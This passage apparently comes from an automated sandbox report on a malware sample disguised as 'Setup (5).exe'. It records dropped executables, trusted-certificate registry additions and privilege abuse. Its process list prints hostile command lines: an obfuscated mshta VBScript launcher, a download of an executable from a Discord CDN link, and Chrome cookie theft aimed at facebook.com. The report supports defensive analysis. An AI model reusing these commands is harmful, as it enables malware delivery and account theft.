0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6024070.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6707195.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\5335236.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\2857716.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8473.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\ViPPIwqv5bR0VGFmRSnZKqzN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8PGGC.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build\build.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (5).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv AQ4ciwWch0+5spMnjZvMow.0.2
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\B926.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Users\Admin\AppData\Local\Temp\is-13CSK.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-13CSK.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$1031C,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1304 -ip 1304
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 276
C:\Users\Admin\AppData\Roaming\5335236.exe
"C:\Users\Admin\AppData\Roaming\5335236.exe"
C:\Users\Admin\AppData\Roaming\4750957.exe
"C:\Users\Admin\AppData\Roaming\4750957.exe"
C:\Users\Admin\AppData\Roaming\2857716.exe
"C:\Users\Admin\AppData\Roaming\2857716.exe"
C:\Users\Admin\AppData\Roaming\1156460.exe
"C:\Users\Admin\AppData\Roaming\1156460.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1436 -ip 1436
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 460
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4032 -ip 4032
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2376 -ip 2376
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 276
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\19780\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 664 -ip 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 960 -ip 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1020 -ip 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 296
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 280
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 292
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\8473.exe
C:\Users\Admin\AppData\Local\Temp\8473.exe
C:\Users\Admin\AppData\Local\Temp\8908.exe
C:\Users\Admin\AppData\Local\Temp\8908.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4160 -ip 4160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 272
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 604 -p 1104 -ip 1104
C:\Users\Admin\AppData\Local\Temp\8F33.exe
C:\Users\Admin\AppData\Local\Temp\8F33.exe
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Users\Admin\AppData\Local\Temp\9232.exe
C:\Users\Admin\AppData\Local\Temp\9232.exe
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\is-STBT5.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-STBT5.tmp\Stats.tmp" /SL5="$20424,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-AH8GQ.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AH8GQ.tmp\Inlog.tmp" /SL5="$104D8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
